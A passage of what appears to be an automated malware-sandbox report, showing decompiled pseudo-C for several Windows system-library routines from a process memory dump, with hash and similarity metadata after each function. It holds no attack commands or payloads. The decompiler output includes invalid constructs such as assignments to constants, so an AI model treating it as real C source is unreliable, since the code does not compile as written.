                                                    							_t181 = _v92;
                                                    							L31:
                                                    							_t226 = _t226 + 1;
                                                    							_t181 =  &(_t181[0x18]);
                                                    							_v88 = _t226;
                                                    							_v92 = _t181;
                                                    						} while (_t226 < 4);
                                                    						goto L34;
                                                    					}
                                                    					L9:
                                                    					_t172 = _v104;
                                                    					_t222 = _v100;
                                                    					goto L10;
                                                    				}
                                                    				_t247 = _t246 | 0xffffffff;
                                                    				_t208 = _t247;
                                                    				_v84 = _t247;
                                                    				_v80 = _t208;
                                                    				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                    					_t233 = _v72;
                                                    					_v105 = _v64;
                                                    					_t202 = _v76;
                                                    				} else {
                                                    					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                    					_v105 = 1;
                                                    					if(_v63 <= _t204) {
                                                    						_v63 = _t204;
                                                    					}
                                                    					_t202 = _v76 |  *(_t251 + 0x40);
                                                    					_t233 = _v72 |  *(_t251 + 0x44);
                                                    					_t247 =  *(_t251 + 0x38);
                                                    					_t208 =  *(_t251 + 0x3c);
                                                    					_v76 = _t202;
                                                    					_v72 = _t233;
                                                    					_v84 = _t247;
                                                    					_v80 = _t208;
                                                    				}
                                                    				_v104 = _t202;
                                                    				_v100 = _t233;
                                                    				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                    					_t237 = _v48;
                                                    					_v105 = 1;
                                                    					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                    						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                    						_t237 = _v48;
                                                    					}
                                                    					_t203 = _t202 |  *(_t251 + 0xb8);
                                                    					_t234 = _t233 |  *(_t251 + 0xbc);
                                                    					_t247 = _t247 &  *(_t251 + 0xb0);
                                                    					_t208 = _t208 &  *(_t251 + 0xb4);
                                                    					_v104 = _t203;
                                                    					_v76 = _t203;
                                                    					_v100 = _t234;
                                                    					_v72 = _t234;
                                                    					_v84 = _t247;
                                                    					_v80 = _t208;
                                                    				}
                                                    				if(_v105 == 0) {
                                                    					_v36 = _v36 & 0x00000000;
                                                    					_t208 = 0;
                                                    					_t247 = 0;
                                                    					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                    					goto L19;
                                                    				} else {
                                                    					_v36 = 1;
                                                    					goto L8;
                                                    				}
                                                    			}
































































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eaca324619b6c11b4a66da26d0a7edae63e0300c23c1bd9d8722d2a63b0c1d6d
                                                    • Instruction ID: 860393f8c2a42b4d6a23bb72240e5e15315d3c2cfa0876a5080f21b2b91d36a2
                                                    • Opcode Fuzzy Hash: eaca324619b6c11b4a66da26d0a7edae63e0300c23c1bd9d8722d2a63b0c1d6d
                                                    • Instruction Fuzzy Hash: 6EC121756093809FD354CF28C480A6AFBE1FF88308F1449AEF9998B352D775E845CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 74%
                                                    			E04B703E2(signed int __ecx, signed int __edx) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				intOrPtr _v40;
                                                    				signed int _v44;
                                                    				signed int _v48;
                                                    				char _v52;
                                                    				char _v56;
                                                    				char _v64;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t56;
                                                    				signed int _t58;
                                                    				char* _t64;
                                                    				intOrPtr _t65;
                                                    				signed int _t74;
                                                    				signed int _t79;
                                                    				char* _t83;
                                                    				intOrPtr _t84;
                                                    				signed int _t93;
                                                    				signed int _t94;
                                                    				signed char* _t95;
                                                    				signed int _t99;
                                                    				signed int _t100;
                                                    				signed char* _t101;
                                                    				signed int _t105;
                                                    				signed int _t119;
                                                    				signed int _t120;
                                                    				void* _t122;
                                                    				signed int _t123;
                                                    				signed int _t127;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t127;
                                                    				_t119 = __ecx;
                                                    				_t105 = __edx;
                                                    				_t118 = 0;
                                                    				_v20 = __edx;
                                                    				_t120 =  *(__ecx + 0x20);
                                                    				if(E04B70548(__ecx, 0) != 0) {
                                                    					_t56 = 0xc000022d;
                                                    					L23:
                                                    					return E04B8B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                    				} else {
                                                    					_v12 = _v12 | 0xffffffff;
                                                    					_t58 = _t120 + 0x24;
                                                    					_t109 =  *(_t120 + 0x18);
                                                    					_t118 = _t58;
                                                    					_v16 = _t58;
                                                    					E04B5B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                    					_v52 = 0x18;
                                                    					_v48 = 0;
                                                    					0x840 = 0x40;
                                                    					if( *0x4c37c1c != 0) {
                                                    					}
                                                    					_v40 = 0x840;
                                                    					_v44 = _t105;
                                                    					_v36 = 0;
                                                    					_v32 = 0;
                                                    					if(E04B67D50() != 0) {
                                                    						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    					} else {
                                                    						_t64 = 0x7ffe0384;
                                                    					}
                                                    					if( *_t64 != 0) {
                                                    						_t65 =  *[fs:0x30];
                                                    						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                    						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                    							_t100 = E04B67D50();
                                                    							__eflags = _t100;
                                                    							if(_t100 == 0) {
                                                    								_t101 = 0x7ffe0385;
                                                    							} else {
                                                    								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    							}
                                                    							__eflags =  *_t101 & 0x00000020;
                                                    							if(( *_t101 & 0x00000020) != 0) {
                                                    								_t118 = _t118 | 0xffffffff;
                                                    								_t109 = 0x1485;
                                                    								E04BC7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                    							}
                                                    						}
                                                    					}
                                                    					_t105 = 0;
                                                    					while(1) {
                                                    						_push(0x60);
                                                    						_push(5);
                                                    						_push( &_v64);
                                                    						_push( &_v52);
                                                    						_push(0x100021);
                                                    						_push( &_v12);
                                                    						_t122 = E04B89830();
                                                    						if(_t122 >= 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _t122 - 0xc0000034;
                                                    						if(_t122 == 0xc0000034) {
                                                    							L38:
                                                    							_t120 = 0xc0000135;
                                                    							break;
                                                    						}
                                                    						__eflags = _t122 - 0xc000003a;
                                                    						if(_t122 == 0xc000003a) {
                                                    							goto L38;
                                                    						}
                                                    						__eflags = _t122 - 0xc0000022;
                                                    						if(_t122 != 0xc0000022) {
                                                    							break;
                                                    						}
                                                    						__eflags = _t105;
                                                    						if(__eflags != 0) {
                                                    							break;
                                                    						}
                                                    						_t109 = _t119;
                                                    						_t99 = E04BC69A6(_t119, __eflags);
                                                    						__eflags = _t99;
                                                    						if(_t99 == 0) {
                                                    							break;
                                                    						}
                                                    						_t105 = _t105 + 1;
                                                    					}
                                                    					if( !_t120 >= 0) {
                                                    						L22:
                                                    						_t56 = _t120;
                                                    						goto L23;
                                                    					}
                                                    					if( *0x4c37c04 != 0) {
                                                    						_t118 = _v12;
                                                    						_t120 = E04BCA7AC(_t119, _t118, _t109);
                                                    						__eflags = _t120;
                                                    						if(_t120 >= 0) {
                                                    							goto L10;
                                                    						}
                                                    						__eflags =  *0x4c37bd8;
                                                    						if( *0x4c37bd8 != 0) {
                                                    							L20:
                                                    							if(_v12 != 0xffffffff) {
                                                    								_push(_v12);
                                                    								E04B895D0();
                                                    							}
                                                    							goto L22;
                                                    						}
                                                    					}
                                                    					L10:
                                                    					_push(_v12);
                                                    					_t105 = _t119 + 0xc;
                                                    					_push(0x1000000);
                                                    					_push(0x10);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(0xf);
                                                    					_push(_t105);
                                                    					_t120 = E04B899A0();
                                                    					if(_t120 < 0) {
                                                    						__eflags = _t120 - 0xc000047e;
                                                    						if(_t120 == 0xc000047e) {
                                                    							L51:
                                                    							_t74 = E04BC3540(_t120);
                                                    							_t119 = _v16;
                                                    							_t120 = _t74;
                                                    							L52:
                                                    							_t118 = 0x1485;
                                                    							E04B4B1E1(_t120, 0x1485, 0, _t119);
                                                    							goto L20;
                                                    						}
                                                    						__eflags = _t120 - 0xc000047f;
                                                    						if(_t120 == 0xc000047f) {
                                                    							goto L51;
                                                    						}
                                                    						__eflags = _t120 - 0xc0000462;
                                                    						if(_t120 == 0xc0000462) {
                                                    							goto L51;
                                                    						}
                                                    						_t119 = _v16;
                                                    						__eflags = _t120 - 0xc0000017;
                                                    						if(_t120 != 0xc0000017) {
                                                    							__eflags = _t120 - 0xc000009a;
                                                    							if(_t120 != 0xc000009a) {
                                                    								__eflags = _t120 - 0xc000012d;
                                                    								if(_t120 != 0xc000012d) {
                                                    									_v28 = _t119;
                                                    									_push( &_v56);
                                                    									_push(1);
                                                    									_v24 = _t120;
                                                    									_push( &_v28);
                                                    									_push(1);
                                                    									_push(2);
                                                    									_push(0xc000007b);
                                                    									_t79 = E04B8AAF0();
                                                    									__eflags = _t79;
                                                    									if(_t79 >= 0) {
                                                    										__eflags =  *0x4c38474 - 3;
                                                    										if( *0x4c38474 != 3) {
                                                    											 *0x4c379dc =  *0x4c379dc + 1;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L52;
                                                    					}
                                                    					if(E04B67D50() != 0) {
                                                    						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    					} else {
                                                    						_t83 = 0x7ffe0384;
                                                    					}
                                                    					if( *_t83 != 0) {
                                                    						_t84 =  *[fs:0x30];
                                                    						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                    						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                    							_t94 = E04B67D50();
                                                    							__eflags = _t94;
                                                    							if(_t94 == 0) {
                                                    								_t95 = 0x7ffe0385;
                                                    							} else {
                                                    								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    							}
                                                    							__eflags =  *_t95 & 0x00000020;
                                                    							if(( *_t95 & 0x00000020) != 0) {
                                                    								E04BC7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                    							}
                                                    						}
                                                    					}
                                                    					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                    						if( *0x4c38708 != 0) {
                                                    							_t118 =  *0x7ffe0330;
                                                    							_t123 =  *0x4c37b00; // 0x0
                                                    							asm("ror esi, cl");
                                                    							 *0x4c3b1e0(_v12, _v20, 0x20);
                                                    							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                    							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                    							asm("sbb esi, esi");
                                                    							_t120 =  ~_t50 & _t93;
                                                    						} else {
                                                    							_t120 = 0;
                                                    						}
                                                    					}
                                                    					if( !_t120 >= 0) {
                                                    						L19:
                                                    						_push( *_t105);
                                                    						E04B895D0();
                                                    						 *_t105 =  *_t105 & 0x00000000;
                                                    						goto L20;
                                                    					}
                                                    					_t120 = E04B57F65(_t119);
                                                    					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                    						__eflags = _t120;
                                                    						if(_t120 < 0) {
                                                    							goto L19;
                                                    						}
                                                    						 *(_t119 + 0x64) = _v12;
                                                    						goto L22;
                                                    					}
                                                    					goto L19;
                                                    				}
                                                    			}









































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 832fa2b1619fdfcd23a8657d68e9d14ac7cae0c61df9364c9c8c7411289ec842
                                                    • Instruction ID: f437f668d9df5bb55800b1e27f304e4f0cdfbe121badf5cb9aaa8579a91551f1
                                                    • Opcode Fuzzy Hash: 832fa2b1619fdfcd23a8657d68e9d14ac7cae0c61df9364c9c8c7411289ec842
                                                    • Instruction Fuzzy Hash: AB91E771E00214AFEF21AA68C844BBD7BB4EB05718F0502E6E961A72D2DBB4BD00D7C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E04B4C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                    				signed int _v8;
                                                    				char _v1036;
                                                    				signed int _v1040;
                                                    				char _v1048;
                                                    				signed int _v1052;
                                                    				signed char _v1056;
                                                    				void* _v1058;
                                                    				char _v1060;
                                                    				signed int _v1064;
                                                    				void* _v1068;
                                                    				intOrPtr _v1072;
                                                    				void* _v1084;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t72;
                                                    				signed int _t74;
                                                    				intOrPtr _t77;
                                                    				signed int _t78;
                                                    				signed int _t81;
                                                    				void* _t101;
                                                    				signed int _t102;
                                                    				signed int _t107;
                                                    				signed int _t109;
                                                    				signed int _t110;
                                                    				signed char _t111;
                                                    				signed int _t112;
                                                    				signed int _t113;
                                                    				signed int _t114;
                                                    				intOrPtr _t116;
                                                    				void* _t117;
                                                    				char _t118;
                                                    				void* _t120;
                                                    				char _t121;
                                                    				signed int _t122;
                                                    				signed int _t123;
                                                    				signed int _t125;
                                                    
                                                    				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                    				_v8 =  *0x4c3d360 ^ _t125;
                                                    				_t116 = _a4;
                                                    				_v1056 = _a16;
                                                    				_v1040 = _a24;
                                                    				if(E04B56D30( &_v1048, _a8) < 0) {
                                                    					L4:
                                                    					_pop(_t117);
                                                    					_pop(_t120);
                                                    					_pop(_t101);
                                                    					return E04B8B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                    				}
                                                    				_t70 = _a20;
                                                    				if(_t70 >= 0x3f4) {
                                                    					_t121 = _t70 + 0xc;
                                                    					L19:
                                                    					_t107 =  *( *[fs:0x30] + 0x18);
                                                    					__eflags = _t107;
                                                    					if(_t107 == 0) {
                                                    						L60:
                                                    						_t68 = 0xc0000017;
                                                    						goto L4;
                                                    					}
                                                    					_t72 =  *0x4c37b9c; // 0x0
                                                    					_t74 = L04B64620(_t107, _t107, _t72 + 0x180000, _t121);
                                                    					_v1064 = _t74;
                                                    					__eflags = _t74;
                                                    					if(_t74 == 0) {
                                                    						goto L60;
                                                    					}
                                                    					_t102 = _t74;
                                                    					_push( &_v1060);
                                                    					_push(_t121);
                                                    					_push(_t74);
                                                    					_push(2);
                                                    					_push( &_v1048);
                                                    					_push(_t116);
                                                    					_t122 = E04B89650();
                                                    					__eflags = _t122;
                                                    					if(_t122 >= 0) {
                                                    						L7:
                                                    						_t114 = _a12;
                                                    						__eflags = _t114;
                                                    						if(_t114 != 0) {
                                                    							_t77 = _a20;
                                                    							L26:
                                                    							_t109 =  *(_t102 + 4);
                                                    							__eflags = _t109 - 3;
                                                    							if(_t109 == 3) {
                                                    								L55:
                                                    								__eflags = _t114 - _t109;
                                                    								if(_t114 != _t109) {
                                                    									L59:
                                                    									_t122 = 0xc0000024;
                                                    									L15:
                                                    									_t78 = _v1052;
                                                    									__eflags = _t78;
                                                    									if(_t78 != 0) {
                                                    										L04B677F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                    									}
                                                    									_t68 = _t122;
                                                    									goto L4;
                                                    								}
                                                    								_t110 = _v1056;
                                                    								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                    								_v1060 = _t118;
                                                    								__eflags = _t110;
                                                    								if(_t110 == 0) {
                                                    									L10:
                                                    									_t122 = 0x80000005;
                                                    									L11:
                                                    									_t81 = _v1040;
                                                    									__eflags = _t81;
                                                    									if(_t81 == 0) {
                                                    										goto L15;
                                                    									}
                                                    									__eflags = _t122;
                                                    									if(_t122 >= 0) {
                                                    										L14:
                                                    										 *_t81 = _t118;
                                                    										goto L15;
                                                    									}
                                                    									__eflags = _t122 - 0x80000005;
                                                    									if(_t122 != 0x80000005) {
                                                    										goto L15;
                                                    									}
                                                    									goto L14;
                                                    								}
                                                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                    								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                    									goto L10;
                                                    								}
                                                    								_push( *((intOrPtr*)(_t102 + 8)));
                                                    								_t59 = _t102 + 0xc; // 0xc
                                                    								_push(_t110);
                                                    								L54:
                                                    								E04B8F3E0();
                                                    								_t125 = _t125 + 0xc;
                                                    								goto L11;
                                                    							}
                                                    							__eflags = _t109 - 7;
                                                    							if(_t109 == 7) {
                                                    								goto L55;
                                                    							}
                                                    							_t118 = 4;
                                                    							__eflags = _t109 - _t118;
                                                    							if(_t109 != _t118) {
                                                    								__eflags = _t109 - 0xb;
                                                    								if(_t109 != 0xb) {
                                                    									__eflags = _t109 - 1;
                                                    									if(_t109 == 1) {
                                                    										__eflags = _t114 - _t118;
                                                    										if(_t114 != _t118) {
                                                    											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                    											_v1060 = _t118;
                                                    											__eflags = _t118 - _t77;
                                                    											if(_t118 > _t77) {
                                                    												goto L10;
                                                    											}
                                                    											_push(_t118);
                                                    											_t56 = _t102 + 0xc; // 0xc
                                                    											_push(_v1056);
                                                    											goto L54;
                                                    										}
                                                    										__eflags = _t77 - _t118;
                                                    										if(_t77 != _t118) {
                                                    											L34:
                                                    											_t122 = 0xc0000004;
                                                    											goto L15;
                                                    										}
                                                    										_t111 = _v1056;
                                                    										__eflags = _t111 & 0x00000003;
                                                    										if((_t111 & 0x00000003) == 0) {
                                                    											_v1060 = _t118;
                                                    											__eflags = _t111;
                                                    											if(__eflags == 0) {
                                                    												goto L10;
                                                    											}
                                                    											_t42 = _t102 + 0xc; // 0xc
                                                    											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                    											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                    											_push(_t111);
                                                    											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                    											_push(0);
                                                    											_push( &_v1048);
                                                    											_t122 = E04B813C0(_t102, _t118, _t122, __eflags);
                                                    											L44:
                                                    											_t118 = _v1072;
                                                    											goto L11;
                                                    										}
                                                    										_t122 = 0x80000002;
                                                    										goto L15;
                                                    									}
                                                    									_t122 = 0xc0000024;
                                                    									goto L44;
                                                    								}
                                                    								__eflags = _t114 - _t109;
                                                    								if(_t114 != _t109) {
                                                    									goto L59;
                                                    								}
                                                    								_t118 = 8;
                                                    								__eflags = _t77 - _t118;
                                                    								if(_t77 != _t118) {
                                                    									goto L34;
                                                    								}
                                                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                    								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                    									goto L34;
                                                    								}
                                                    								_t112 = _v1056;
                                                    								_v1060 = _t118;
                                                    								__eflags = _t112;
                                                    								if(_t112 == 0) {
                                                    									goto L10;
                                                    								}
                                                    								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                    								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                    								goto L11;
                                                    							}
                                                    							__eflags = _t114 - _t118;
                                                    							if(_t114 != _t118) {
                                                    								goto L59;
                                                    							}
                                                    							__eflags = _t77 - _t118;
                                                    							if(_t77 != _t118) {
                                                    								goto L34;
                                                    							}
                                                    							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                    							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                    								goto L34;
                                                    							}
                                                    							_t113 = _v1056;
                                                    							_v1060 = _t118;
                                                    							__eflags = _t113;
                                                    							if(_t113 == 0) {
                                                    								goto L10;
                                                    							}
                                                    							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                    							goto L11;
                                                    						}
                                                    						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                    						__eflags = _t118 - _a20;
                                                    						if(_t118 <= _a20) {
                                                    							_t114 =  *(_t102 + 4);
                                                    							_t77 = _t118;
                                                    							goto L26;
                                                    						}
                                                    						_v1060 = _t118;
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t122 - 0x80000005;
                                                    					if(_t122 != 0x80000005) {
                                                    						goto L15;
                                                    					}
                                                    					L04B677F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                    					L18:
                                                    					_t121 = _v1060;
                                                    					goto L19;
                                                    				}
                                                    				_push( &_v1060);
                                                    				_push(0x400);
                                                    				_t102 =  &_v1036;
                                                    				_push(_t102);
                                                    				_push(2);
                                                    				_push( &_v1048);
                                                    				_push(_t116);
                                                    				_t122 = E04B89650();
                                                    				if(_t122 >= 0) {
                                                    					__eflags = 0;
                                                    					_v1052 = 0;
                                                    					goto L7;
                                                    				}
                                                    				if(_t122 == 0x80000005) {
                                                    					goto L18;
                                                    				}
                                                    				goto L4;
                                                    			}











































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0cc8259c864f61f2885d8b535604382142ccc7a17ce34aca2466f9bfe8680bd6
                                                    • Instruction ID: cafcd7fea89763332abb552e83e755ef445cb37222c4d272aaf46a6b93ccb95a
                                                    • Opcode Fuzzy Hash: 0cc8259c864f61f2885d8b535604382142ccc7a17ce34aca2466f9bfe8680bd6
                                                    • Instruction Fuzzy Hash: 0B819F756046019FDB25CE14C890ABAB7E4EBC8354F1548AEEDC59B240EB70FD45CBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 39%
                                                    			E04BDB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                    				char _v8;
                                                    				signed int _v12;
                                                    				signed int _t80;
                                                    				signed int _t83;
                                                    				intOrPtr _t89;
                                                    				signed int _t92;
                                                    				signed char _t106;
                                                    				signed int* _t107;
                                                    				intOrPtr _t108;
                                                    				intOrPtr _t109;
                                                    				signed int _t114;
                                                    				void* _t115;
                                                    				void* _t117;
                                                    				void* _t119;
                                                    				void* _t122;
                                                    				signed int _t123;
                                                    				signed int* _t124;
                                                    
                                                    				_t106 = _a12;
                                                    				if((_t106 & 0xfffffffc) != 0) {
                                                    					return 0xc000000d;
                                                    				}
                                                    				if((_t106 & 0x00000002) != 0) {
                                                    					_t106 = _t106 | 0x00000001;
                                                    				}
                                                    				_t109 =  *0x4c37b9c; // 0x0
                                                    				_t124 = L04B64620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                    				if(_t124 != 0) {
                                                    					 *_t124 =  *_t124 & 0x00000000;
                                                    					_t124[1] = _t124[1] & 0x00000000;
                                                    					_t124[4] = _t124[4] & 0x00000000;
                                                    					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                    						L13:
                                                    						_push(_t124);
                                                    						if((_t106 & 0x00000002) != 0) {
                                                    							_push(0x200);
                                                    							_push(0x28);
                                                    							_push(0xffffffff);
                                                    							_t122 = E04B89800();
                                                    							if(_t122 < 0) {
                                                    								L33:
                                                    								if((_t124[4] & 0x00000001) != 0) {
                                                    									_push(4);
                                                    									_t64 =  &(_t124[1]); // 0x4
                                                    									_t107 = _t64;
                                                    									_push(_t107);
                                                    									_push(5);
                                                    									_push(0xfffffffe);
                                                    									E04B895B0();
                                                    									if( *_t107 != 0) {
                                                    										_push( *_t107);
                                                    										E04B895D0();
                                                    									}
                                                    								}
                                                    								_push(_t124);
                                                    								_push(0);
                                                    								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                    								L37:
                                                    								L04B677F0();
                                                    								return _t122;
                                                    							}
                                                    							_t124[4] = _t124[4] | 0x00000002;
                                                    							L18:
                                                    							_t108 = _a8;
                                                    							_t29 =  &(_t124[0x105]); // 0x414
                                                    							_t80 = _t29;
                                                    							_t30 =  &(_t124[5]); // 0x14
                                                    							_t124[3] = _t80;
                                                    							_t123 = 0;
                                                    							_t124[2] = _t30;
                                                    							 *_t80 = _t108;
                                                    							if(_t108 == 0) {
                                                    								L21:
                                                    								_t112 = 0x400;
                                                    								_push( &_v8);
                                                    								_v8 = 0x400;
                                                    								_push(_t124[2]);
                                                    								_push(0x400);
                                                    								_push(_t124[3]);
                                                    								_push(0);
                                                    								_push( *_t124);
                                                    								_t122 = E04B89910();
                                                    								if(_t122 != 0xc0000023) {
                                                    									L26:
                                                    									if(_t122 != 0x106) {
                                                    										L40:
                                                    										if(_t122 < 0) {
                                                    											L29:
                                                    											_t83 = _t124[2];
                                                    											if(_t83 != 0) {
                                                    												_t59 =  &(_t124[5]); // 0x14
                                                    												if(_t83 != _t59) {
                                                    													L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                    												}
                                                    											}
                                                    											_push( *_t124);
                                                    											E04B895D0();
                                                    											goto L33;
                                                    										}
                                                    										 *_a16 = _t124;
                                                    										return 0;
                                                    									}
                                                    									if(_t108 != 1) {
                                                    										_t122 = 0;
                                                    										goto L40;
                                                    									}
                                                    									_t122 = 0xc0000061;
                                                    									goto L29;
                                                    								} else {
                                                    									goto L22;
                                                    								}
                                                    								while(1) {
                                                    									L22:
                                                    									_t89 =  *0x4c37b9c; // 0x0
                                                    									_t92 = L04B64620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                    									_t124[2] = _t92;
                                                    									if(_t92 == 0) {
                                                    										break;
                                                    									}
                                                    									_t112 =  &_v8;
                                                    									_push( &_v8);
                                                    									_push(_t92);
                                                    									_push(_v8);
                                                    									_push(_t124[3]);
                                                    									_push(0);
                                                    									_push( *_t124);
                                                    									_t122 = E04B89910();
                                                    									if(_t122 != 0xc0000023) {
                                                    										goto L26;
                                                    									}
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                    								}
                                                    								_t122 = 0xc0000017;
                                                    								goto L26;
                                                    							}
                                                    							_t119 = 0;
                                                    							do {
                                                    								_t114 = _t124[3];
                                                    								_t119 = _t119 + 0xc;
                                                    								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                    								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                    								_t123 = _t123 + 1;
                                                    								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                    							} while (_t123 < _t108);
                                                    							goto L21;
                                                    						}
                                                    						_push(0x28);
                                                    						_push(3);
                                                    						_t122 = E04B4A7B0();
                                                    						if(_t122 < 0) {
                                                    							goto L33;
                                                    						}
                                                    						_t124[4] = _t124[4] | 0x00000001;
                                                    						goto L18;
                                                    					}
                                                    					if((_t106 & 0x00000001) == 0) {
                                                    						_t115 = 0x28;
                                                    						_t122 = E04BDE7D3(_t115, _t124);
                                                    						if(_t122 < 0) {
                                                    							L9:
                                                    							_push(_t124);
                                                    							_push(0);
                                                    							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                    							goto L37;
                                                    						}
                                                    						L12:
                                                    						if( *_t124 != 0) {
                                                    							goto L18;
                                                    						}
                                                    						goto L13;
                                                    					}
                                                    					_t15 =  &(_t124[1]); // 0x4
                                                    					_t117 = 4;
                                                    					_t122 = E04BDE7D3(_t117, _t15);
                                                    					if(_t122 >= 0) {
                                                    						_t124[4] = _t124[4] | 0x00000001;
                                                    						_v12 = _v12 & 0x00000000;
                                                    						_push(4);
                                                    						_push( &_v12);
                                                    						_push(5);
                                                    						_push(0xfffffffe);
                                                    						E04B895B0();
                                                    						goto L12;
                                                    					}
                                                    					goto L9;
                                                    				} else {
                                                    					return 0xc0000017;
                                                    				}
                                                    			}





















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1863518b5e5e44890950d3650e96e51695f6e3f2efc809b93e815e58c14698f1
                                                    • Instruction ID: e73344061f528ce53bfa59f09dddbcd53acb14185c2b8e3f8cc38051765d29bf
                                                    • Opcode Fuzzy Hash: 1863518b5e5e44890950d3650e96e51695f6e3f2efc809b93e815e58c14698f1
                                                    • Instruction Fuzzy Hash: 8B710E72204B01AFEB31DF14C880F66B7E5EF44724F1245E8E65A8B6A0EB79F941CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

